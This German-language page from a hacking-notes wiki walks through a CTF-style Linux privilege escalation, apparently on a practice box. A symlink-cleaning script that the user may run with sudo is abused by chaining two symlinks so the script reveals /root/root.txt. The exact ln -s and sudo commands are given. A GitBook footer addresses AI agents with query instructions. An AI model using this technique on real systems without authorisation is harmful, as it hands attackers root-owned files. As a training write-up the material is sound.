> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/de/privesc/sudoers/sudo-double-symlink-linux-privilege-escalation.md).

# Sudo Double Symlink - Linux-Privilegieneskalation

## Was es ist

Die sudoers-Privilegieneskalation beginnt mit den Befehlen, die ein Benutzer über `sudo`. Fehlkonfigurierte Binärdateien, unsichere Skriptargumente, der Umgang mit symbolischen Links und verwundbare sudo-Versionen können eingeschränkte sudo-Rechte in eine Root-Shell verwandeln. Diese spezielle Seite konzentriert sich auf **Sudo (doppelte symbolische Verknüpfung)** und hält den Ausnutzungsablauf praxisnah: Bedingung identifizieren, sicher validieren und dann die kleinste nötige Nutzlast ausführen, um die Auswirkungen zu belegen.

## Enumeration

Beginnen Sie damit, den lokalen Kontext und die genaue Fehlkonfiguration zu bestätigen, bevor Sie den Exploit-Pfad ausführen.

```bash
sudo -l
sudo --version
```

## Beispiele

### SUDO - Clean/\_synLink.sh

Wir suchen nach einer Schwachstelle, die eine Privilegieneskalation ermöglicht. Wir entdecken eine Datei mit SUID-Berechtigungen.

<figure><img src="/files/9eeece112eb8e54afa00c1410859403bf25574eb" alt=""><figcaption></figcaption></figure>

#### **Analyse des Symlink-Bereinigungsskripts**

> Wir analysieren ein Skript namens `clean_symlink.sh`, das überprüft, ob die als Argument übergebene Datei ein Symlink ist, der auf eine `.png` Datei verweist. Wenn der Symlink auf eine kritische Datei zeigt, löscht das Skript ihn. Andernfalls verschiebt es den Symlink in das `/var/quarantined/` Verzeichnis. Wenn die Umgebungsvariable `CHECK_CONTENT` auf `wahr`gesetzt ist, versucht das Skript, den Inhalt der Datei zu lesen.

Hier ist der Befehl, um die für den Betrieb benötigten Symlinks zu erstellen:

```bash
ln -s /root/root.txt flag.txt
ln -s /home/bob/flag.txt flag.png
```

Dann führen wir das Skript mit dem folgenden Befehl aus, um die Root-Flag zu erhalten:

```bash
sudo CHECK_CONTENT=true /usr/bin/bash /opt/ghost/clean_symlink.sh /home/bob/flag.png 
```

Wir erhalten so die Flag `root.txt`.

<figure><img src="/files/1bf8300588e415a9c04519910968b56feb40b708" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/de/privesc/sudoers/sudo-double-symlink-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
